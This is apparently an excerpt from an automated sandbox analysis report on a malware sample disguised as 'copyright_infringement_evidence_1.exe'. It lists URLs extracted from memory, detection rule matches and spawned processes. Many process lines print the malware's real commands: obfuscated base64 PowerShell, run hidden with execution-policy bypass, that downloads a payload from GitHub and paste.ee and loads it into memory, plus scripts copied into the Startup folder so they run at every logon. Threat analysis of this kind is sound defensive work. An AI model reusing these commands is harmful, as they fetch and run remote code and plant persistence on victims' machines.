Source: powershell.exe, 0000001D.00000002.2295368563.00000174D4B71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2295368563.00000174D4B63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2295109994.000001FBCD319000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2295109994.000001FBCD331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2569063235.000001BA5AADF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2569063235.000001BA5AACA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2571339903.000001AA5180F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2571339903.000001AA517EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2350744372.000002080FCB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2351652248.000001EF51C71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2398514056.000002DB32739000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2398514056.000002DB3274D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2490781684.000002390BF5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2490781684.000002390BF6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.3150551059.000001ECD64C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.3150551059.000001ECD64AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2542796485.000002103DBB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: wscript.exe, 0000002C.00000003.2827342790.000001A7C49D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://analytics.paste.ee
Source: wscript.exe, 0000002C.00000003.2827342790.000001A7C49D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://analytics.paste.ee;
Source: wscript.exe, 0000002C.00000003.2827342790.000001A7C49D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com
Source: wscript.exe, 0000002C.00000003.2827342790.000001A7C49D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com;
Source: powershell.exe, 00000024.00000002.2492413706.000001EF61CE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000024.00000002.2492413706.000001EF61CE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000024.00000002.2492413706.000001EF61CE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: copyright_infringement_evidence_1.exe, copyright_infringement_evidence_1.exe, 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000000.2054790226.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
Source: wscript.exe, 0000002C.00000003.2827342790.000001A7C49D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com
Source: wscript.exe, 0000002C.00000003.2827342790.000001A7C49D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fonts.gstatic.com;
Source: powershell.exe, 00000034.00000002.2542796485.000002103DDDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000023.00000002.2350744372.00000208108E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2351652248.000001EF528A3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 0000001F.00000002.2686280354.000001BA72CA4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://go.microsoft.co
Source: powershell.exe, 00000023.00000002.2491780755.000002081FE6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2491780755.000002081FD28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2492413706.000001EF61E2B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2492413706.000001EF61CE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: wscript.exe, 0000002C.00000002.3471646885.000001A7C499D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000003.2828182753.000001A7C499D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://paste.ee//a
Source: wscript.exe, 00000008.00000003.2745856502.000001C4CE1F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.2757884807.000001C4CE1F9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2741039661.000001C4CE1EC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://paste.ee/1
Source: wscript.exe, 0000000A.00000003.2747396981.0000024591770000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2754284402.0000024591770000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2751344007.0000024591770000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2750323628.0000024591770000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2757372602.0000024591770000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://paste.ee/9
Source: wscript.exe, 00000027.00000002.3471457140.0000025469980000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://paste.ee/Ne
Source: wscript.exe, 0000000A.00000003.2747396981.0000024591770000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2754284402.0000024591770000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2751344007.0000024591770000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2750323628.0000024591770000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2757372602.0000024591770000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000027.00000002.3471457140.00000254699A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000027.00000002.3471457140.0000025469980000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000002.3471646885.000001A7C499D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000003.2828182753.000001A7C499D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://paste.ee/d/0Hqnx
Source: wscript.exe, 0000000A.00000003.2753742233.00000245916EB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2756039132.00000245916F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000003.2828182753.000001A7C49BC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000002.3471646885.000001A7C49BC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://paste.ee/d/0HqnxP
Source: wscript.exe, 00000027.00000002.3471457140.0000025469980000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://paste.ee/d/0Hqnxte
Source: wscript.exe, 0000002C.00000002.3471646885.000001A7C499D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000003.2828182753.000001A7C499D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://paste.ee/d/0Hqnxza
Source: wscript.exe, 00000008.00000003.2745856502.000001C4CE1F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.2757884807.000001C4CE1F9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2741039661.000001C4CE1EC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://paste.ee/d/6fcuV
Source: wscript.exe, 00000008.00000002.2758183805.000001C4CE20F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2749612240.000001C4CE20C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2745856502.000001C4CE20C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2749879678.000001C4CE20E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://paste.ee/d/6fcuVP
Source: wscript.exe, 00000008.00000003.2745856502.000001C4CE1F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.2757884807.000001C4CE1F9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2741039661.000001C4CE1EC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://paste.ee/d/6fcuVee/d
Source: wscript.exe, 0000002C.00000002.3471646885.000001A7C499D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000003.2828182753.000001A7C499D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://paste.ee:443/d/0Hqnxku
Source: wscript.exe, 00000027.00000002.3471457140.0000025469980000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://paste.ee:443/d/0Hqnxky
Source: wscript.exe, 0000000A.00000003.2747396981.0000024591770000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2754284402.0000024591770000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2751344007.0000024591770000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2750323628.0000024591770000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2757372602.0000024591770000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://paste.ee:443/d/0Hqnxu
Source: wscript.exe, 00000008.00000003.2751834805.000001C4CE1EC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2749778775.000001C4CE1EC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.2757726082.000001C4CE1EC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2741039661.000001C4CE1EC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://paste.ee:443/d/6fcuV
Source: powershell.exe, 00000024.00000002.2530533193.000001EF69EA0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2530773405.000001EF6A015000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2351652248.000001EF51EA3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://raw.gith
Source: powershell.exe, 00000023.00000002.2350744372.000002080FEE3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2351652248.000001EF51EA3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2542796485.000002103DDDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.co
Source: powershell.exe, 00000023.00000002.2350744372.000002081137E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2350744372.00000208112E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2351652248.000001EF532A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2351652248.000001EF53306000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com
Source: powershell.exe, 00000034.00000002.2542796485.000002103DDDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNote_J.txt
Source: powershell.exe, 00000024.00000002.2351652248.000001EF51EA3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNote_J.txtKks;
Source: copyright_infringement_evidence_1.exe, 00000000.00000003.2069485125.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000002.2763562068.00000139D8A1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rdoge.ru/bee/config.json
Source: copyright_infringement_evidence_1.exe, 00000000.00000002.2763562068.00000139D8A1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rdoge.ru/bee/config.jsonf
Source: wscript.exe, 0000002C.00000003.2827342790.000001A7C49D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.gravatar.com
Source: wscript.exe, 0000002C.00000003.2827342790.000001A7C49D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://themes.googleusercontent.com
Source: wscript.exe, 0000002C.00000003.2827342790.000001A7C49D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: wscript.exe, 0000002C.00000003.2827342790.000001A7C49D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com;
Source: wscript.exe, 0000002C.00000003.2827342790.000001A7C49D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com

System Summary

Source: Process Memory Space: powershell.exe PID: 8000, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 1784, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 8824, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: initial sample Static PE information: Filename: copyright_infringement_evidence_1.exe
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exe COM Object queried: Server XML HTTP 6.0 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{88d96a0b-f192-11d4-a65f-0040963251e5}
Source: C:\Windows\System32\wscript.exe COM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACAAJABlAE4AdgA6AGMATwBNAFMAUABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBOACcAJwApACgAIAAoACgAJwB7ADIAfQB1AHIAbAAgAD0AIAB7ADAAJwArACcAfQBoAHQAdAAnACsAJwBwAHMAOgAvAC8AcgBhAHcALgAnACsAJwBnAGkAdABoACcAKwAnAHUAJwArACcAYgB1AHMAZQByACcAKwAnAGMAbwBuAHQAJwArACcAZQBuAHQALgBjAG8AJwArACcAbQAvAE4AJwArACcAbwBEAGUAdABlAGMAJwArACcAdABPACcAKwAnAG4ALwBOAG8ARABlACcAKwAnAHQAZQBjAHQATwBuAC8AJwArACcAcgAnACsAJwBlACcAKwAnAGYAJwArACcAcwAvACcAKwAnAGgAZQAnACsAJwBhAGQAcwAvAG0AYQBpAG4ALwBEACcAKwAnAGUAdAAnACsAJwBhAGgATgBvAHQAZQBfAEoALgB0AHgAdAAnACsAJwB7ADAAfQAnACsAJwA7ACAAJwArACcAewAnACsAJwAyAH0AYgBhAHMAJwArACcAZQA2ADQAQwBvACcAKwAnAG4AJwArACcAdABlAG4AJwArACcAdAAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAJwArACcAIABTACcAKwAnAHkAcwB0ACcAKwAnAGUAbQAnACsAJwAuAE4AZQB0ACcAKwAnAC4AVwAnACsAJwBlACcAKwAnAGIAJwArACcAQwBsAGkAZQAnACsAJwBuACcAKwAnAHQAJwArACcAKQAuACcAKwAnAEQAJwArACcAbwB3AG4AbABvACcAKwAnAGEAJwArACcAZABTAHQAJwArACcAcgAnACsAJwBpACcAKwAnAG4AZwAnACsAJwAoAHsAJwArACcAMgB9AHUAcgBsACkAOwAgACcAKwAnAHsAMgB9AGIAaQAnACsAJwBuAGEAJwArACcAcgB5AEMAbwBuACcAKwAnAHQAZQBuAHQAIAA9ACAAWwBTACcAKwAnAHkAcwB0AGUAbQAuACcAKwAnAEMAbwBuAHYAZQByACcAKwAnAHQAXQA6ACcAKwAnADoARgByACcAKwAnAG8AJwArACcAbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAHsAMgB9AGIAYQAnACsAJwBzAGUANgA0ACcAKwAnAEMAJwArACcAbwBuAHQAJwArACcAZQBuAHQAKQAnACsAJwA7ACcAKwAnACAAewAyAH0AJwArACcAYQBzAHMAZQAnACsAJwBtACcAKwAnAGIAJwArACcAbAB5ACAAJwArACcAPQAgAFsAUgBlAGYAJwArACcAbABlACcAKwAnAGMAJwArACcAdABpACcAKwAnAG8AbgAuAEEAcwBzAGUAbQBiACcAKwAnAGwAeQBdADoAOgBMACcAKwAnAG8AYQAnACsAJwBkACcAKwAnACgAewAnACsAJwAyAH0AYgBpAG4AYQAnACsAJwByAHkAJwArACcAQwAnACsAJwBvAG4AdABlAG4AdAApADsAIAB7ADIAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAJwArACcAbgAnACsAJwBkACAAPQAnACsAJwAgAHsAMAB9AFsAJwArACcAZABuAGwAaQBiAC4AJwArACcASQBPAC4ASABvAG0AZQBdADoAOgAnACsAJwBWACcAKwAnAEEASQAoACcAKwAnAHsAJwArACcAMwAnACsAJwB9ADAALwAnACsAJwBLA
CcAKwAnAFMAQQBjACcAKwAnAEYAJwArACcALwBkACcAKwAnAC8AZQBlAC4AJwArACcAZQB0ACcAKwAnAHMAJwArACcAYQAnACsAJwBwAC8ALwA6AHMAcAB0ACcAKwAnAHQAaAAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzAH0AMQAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzACcAKwAnAH0AJwArACcAQwA6ACcAKwAnAHsAJwArACcAMQAnACsAJwB9AFAAcgBvACcAKwAnAGcAcgAnACsAJwBhAG0ARAAnACsAJwBhACcAKwAnAHQAJwArACcAYQB7ADEAJwArACcAfQB7ACcAKwAnADMAfQAsACAAewAnACsAJwAzACcAKwAnAH0AJwArACcAcgBhACcAKwAnAGoAYQBkAG8AJwArACcAewAzACcAKwAnAH0ALAAgACcAKwAnAHsAMwB9AEEAZAAnACsAJwBkACcAKwAnAEkAbgBQACcAKwAnAHIAbwBjAGUAcwBzADMAMgB7ADMAfQAsACcAKwAnACAAewAzACcAKwAnAH0AJwArACcAZAAnACsAJwBlAHMAJwArACcAYQB0ACcAKwAnAGkAdgBhAGQAbwB7ADMAfQAsACcAKwAnAHsAMwB9ACcAKwAnAHsAMwB9ACkAJwArACcAewAnACsAJwAwAH0AJwArACcAOwAnACsAJwAgAEkAJwArACcAbgB2AG8AawAnACsAJwBlAC0ARQB4ACcAKwAnAHAAJwArACcAcgBlAHMAcwBpAG8AbgAgAHsAMgAnACsAJwB9AGMAbwBtACcAKwAnAG0AJwArACcAYQBuACcAKwAnAGQAJwApACAALQBGACAAWwBjAEgAYQByAF0AMwA5ACwAWwBjAEgAYQByAF0AOQAyACwAWwBjAEgAYQByAF0AMwA2ACwAWwBjAEgAYQByAF0AMwA0ACkAIAApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Fromba
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Fromba
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArA
CcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A18DA4A0 CertEnumCertificatesInStore,NtCreateFile, 0_2_00007FF7A18DA4A0
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A18745F0 NtCancelIoFileEx,RtlNtStatusToDosError, 0_2_00007FF7A18745F0
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A178ABFF 0_2_00007FF7A178ABFF
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A1781E23 0_2_00007FF7A1781E23
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A17A8FE7 0_2_00007FF7A17A8FE7
